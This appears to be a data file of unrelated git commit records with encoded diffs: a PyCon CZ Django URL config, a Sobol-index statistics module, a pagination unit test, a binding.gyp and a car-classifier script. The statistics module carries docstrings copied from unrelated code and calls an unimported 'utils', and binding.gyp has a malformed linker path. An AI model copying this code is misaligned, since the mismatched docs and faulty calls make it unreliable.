from django.conf import settings from django.conf.urls import include, url from django.conf.urls.static import static from django.contrib import admin from django.views.generic import TemplateView, RedirectView from pyconcz_2017.common.views import homepage prefixed_urlpatterns = [ url(r'^$', homepage, name='homepage'), url(r'^announcements/', include('pyconcz_2017.announcements.urls')), url(r'^proposals/workshops/$', RedirectView.as_view(url='/2016/proposals/talks')), url(r'^proposals/', include('pyconcz_2017.proposals.urls')), url(r'^about/team/', include('pyconcz_2017.team.urls')), url(r'^speakers/', include('pyconcz_2017.speakers.urls')), url(r'^sponsors/', include('pyconcz_2017.sponsors.urls')), # static pages url(r'^about/$', TemplateView.as_view(template_name='pages/about.html'), name='about'), url(r'^about/code/$', TemplateView.as_view(template_name='pages/code.html'), name='about_code'), url(r'^about/transparency_report/$', TemplateView.as_view(template_name='pages/transparency.html'), name='about_transparency'), url(r'^about/brno/$', TemplateView.as_view(template_name='pages/brno.html'), name='about_brno'), ] urlpatterns = ( static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) + [ url(r'^2016/', include(prefixed_urlpatterns)), url(r'^admin/', include(admin.site.urls)), url(r'^$', RedirectView.as_view(url='/2016/')), ] ) if settings.DEBUG: import debug_toolbar urlpatterns += [ url(r'^__debug__/', include(debug_toolbar.urls)), ]
Python
0.999212
@@ -459,17 +459,17 @@ rl='/201 -6 +7 /proposa @@ -1425,17 +1425,17 @@ l(r'%5E201 -6 +7 /', incl @@ -1566,9 +1566,9 @@ /201 -6 +7 /'))
5becb57514c4b08fc7af2a9a4e38b2c8aac2f576
Create computestats.py
effective_quadratures/computestats.py
effective_quadratures/computestats.py
Python
0.000017
@@ -0,0 +1,3475 @@ +#!/usr/bin/env python%0Aimport numpy as np%0Afrom utils import error_function%0A%0Aclass Statistics(object):%0A %0A %22%22%22%0A This subclass is an domains.ActiveVariableMap specifically for optimization.%0A **See Also**%0A optimizers.BoundedMinVariableMap%0A optimizers.UnboundedMinVariableMap%0A **Notes**%0A This class's train function fits a global quadratic surrogate model to the%0A n+2 active variables---two more than the dimension of the active subspace.%0A This quadratic surrogate is used to map points in the space of active%0A variables back to the simulation parameter space for minimization.%0A %22%22%22%0A%0A # constructor%0A def __init__(self, coefficients, index_set):%0A self.coefficients = coefficients%0A self.index_set = index_set%0A%0A def getMean(self):%0A %22%22%22%0A Train the global quadratic for the regularization.%0A :param ndarray Y: N-by-n matrix of points in the space of active%0A variables.%0A :param int N: merely there satisfy the interface of %60regularize_z%60. It%0A should not be anything other than 1.%0A :return: Z, N-by-(m-n)-by-1 matrix that contains a value of the inactive%0A variables for each value of the inactive variables.%0A :rtype: ndarray%0A **Notes**%0A In contrast to the %60regularize_z%60 in BoundedActiveVariableMap and%0A UnboundedActiveVariableMap, this implementation of %60regularize_z%60 uses%0A a quadratic program to find a single value of the inactive variables%0A for each value of the active variables.%0A %22%22%22 %0A coefficients = self.coefficients%0A mean = coefficients%5B0,0%5D%0A return mean%0A %0A def getVariance(self):%0A coefficients = self.coefficients%0A m, n = coefficients.shape%0A if m %3E n:%0A coefficients = coefficients.T%0A variance = np.sum(coefficients%5B0%5D%5B1:m%5D**2)%0A return variance%0A%0A # Function that computes first order Sobol' indices%0A def getFirstOrderSobol(self):%0A%0A coefficients = self.coefficients%0A m, n = coefficients.shape%0A if m %3E n:%0A coefficients = coefficients.T%0A%0A index_set = self.index_set%0A%0A # Allocate memory!%0A index_set = index_set.getIndexSet()%0A index_set = np.mat(index_set)%0A m, dimensions = index_set.shape%0A variance = self.getVariance()%0A%0A if dimensions == 1:%0A utils.error_function('ERROR: Sobol indices can only be computed for parameter studies with more than one parameter')%0A else:%0A index_set_entries = m%0A local_variance = np.zeros((index_set_entries, dimensions))%0A first_order_sobol_indices = np.zeros((dimensions))%0A%0A # Loop for computing marginal variances!%0A for j in range(0, dimensions):%0A for i in range(0, index_set_entries): # no. of rows%0A # If the index_set%5B0,j%5D is not zero but the remaining are...%0A remaining_indices = np.arange(0, dimensions)%0A remaining_indices = np.delete(remaining_indices, j)%0A if(index_set%5Bi,j%5D != 0 and np.sum(index_set%5Bi, remaining_indices%5D ) == 0):%0A local_variance%5Bi, j%5D = coefficients%5B0%5D%5Bi%5D%0A%0A # Now take the sum of the squares of all the columns%0A for j in range(0, dimensions):%0A first_order_sobol_indices%5Bj%5D = (np.sum(local_variance%5B:,j%5D**2))/(variance)%0A%0A return first_order_sobol_indices%0A
36d0fc3c54dc0c91196c16875c1b1e2d9b0d38ea
Add basic unit test for LimitOffsetPagination
example/tests/unit/test_pagination.py
example/tests/unit/test_pagination.py
Python
0
@@ -0,0 +1,2647 @@ +from collections import OrderedDict%0A%0Afrom rest_framework.request import Request%0Afrom rest_framework.test import APIRequestFactory%0Afrom rest_framework.utils.urls import replace_query_param%0A%0Afrom rest_framework_json_api.pagination import LimitOffsetPagination%0A%0A%0Afactory = APIRequestFactory()%0A%0A%0Aclass TestLimitOffset:%0A %22%22%22%0A Unit tests for %60pagination.LimitOffsetPagination%60.%0A %22%22%22%0A%0A def setup(self):%0A class ExamplePagination(LimitOffsetPagination):%0A default_limit = 10%0A max_limit = 15%0A%0A self.pagination = ExamplePagination()%0A self.queryset = range(1, 101)%0A self.base_url = 'http://testserver/'%0A%0A def paginate_queryset(self, request):%0A return list(self.pagination.paginate_queryset(self.queryset, request))%0A%0A def get_paginated_content(self, queryset):%0A response = self.pagination.get_paginated_response(queryset)%0A return response.data%0A%0A def get_test_request(self, arguments):%0A return Request(factory.get('/', arguments))%0A%0A def test_valid_offset_limit(self):%0A %22%22%22%0A Basic test, assumes offset and limit are given.%0A %22%22%22%0A offset = 10%0A limit = 5%0A count = len(self.queryset)%0A last_offset = count - limit%0A next_offset = 15%0A prev_offset = 5%0A%0A request = self.get_test_request(%7B%0A self.pagination.limit_query_param: limit,%0A self.pagination.offset_query_param: offset%0A %7D)%0A base_url = replace_query_param(self.base_url, self.pagination.limit_query_param, limit)%0A last_url = replace_query_param(base_url, self.pagination.offset_query_param, last_offset)%0A first_url = base_url%0A next_url = replace_query_param(base_url, self.pagination.offset_query_param, next_offset)%0A prev_url = replace_query_param(base_url, self.pagination.offset_query_param, prev_offset)%0A queryset = self.paginate_queryset(request)%0A content = self.get_paginated_content(queryset)%0A next_offset = offset + limit%0A%0A expected_content = %7B%0A 'results': list(range(offset + 1, next_offset + 1)),%0A 'links': OrderedDict(%5B%0A ('first', first_url),%0A ('last', last_url),%0A ('next', next_url),%0A ('prev', prev_url),%0A %5D),%0A 'meta': %7B%0A 'pagination': OrderedDict(%5B%0A ('count', count),%0A ('limit', limit),%0A ('offset', offset),%0A %5D)%0A %7D%0A %7D%0A%0A assert queryset == list(range(offset + 1, next_offset + 1))%0A assert content == expected_content%0A
1eed076cc9140d35cd6897ef2bcb5fe0ae943e35
Revert "remove bindings"
binding.gyp
binding.gyp
Python
0
@@ -0,0 +1,336 @@ +%7B%0A%09'targets': %5B%0A%09%09%7B%0A%09%09%09'target_name': 'sysinfo',%0A%09%09%09'conditions': %5B%0A%09%09%09%09%5B'OS==%22solaris%22', %7B%0A%09%09%09%09%09'sources': %5B%0A%09%09%09%09%09%09'src/solaris.cpp'%0A%09%09%09%09%09%5D%0A%09%09%09%09%7D%5D%0A%09%09%09%5D,%0A%09%09%09'sources': %5B%0A%09%09%09%09'src/binding.cpp',%0A%09%09%09%5D,%0A%09%09%09'linkflags': %5B%0A%09%09%09%09'-Lbuild/cd Release/obj.target/sysinfo/src/'%0A%09%09%09%5D,%0A%09%09%09'defines': %5B%0A%09%09%09%09'OS=%22%3C(OS)%22',%0A%09%09%09%09'is_%3C(OS)'%0A%09%09%09%5D,%0A%09%09%7D%0A%09%5D%0A%7D%0A
9a83e01b9710943c50f80c8ffc4e5d5827cb3b92
Check data preparation
main.py
main.py
Python
0.000027
@@ -0,0 +1,320 @@ +from car_classifier import CarClassifier%0A%0Aif __name__ == %22__main__%22:%0A car_img_dir = 'vehicles'%0A not_car_img_dir = 'non-vehicles'%0A sample_size = 8792%0A car_classifier = CarClassifier(car_img_dir=car_img_dir,%0A not_car_img_dir=not_car_img_dir,%0A sample_size = sample_size)%0A%0A car_classifier.fit()%0A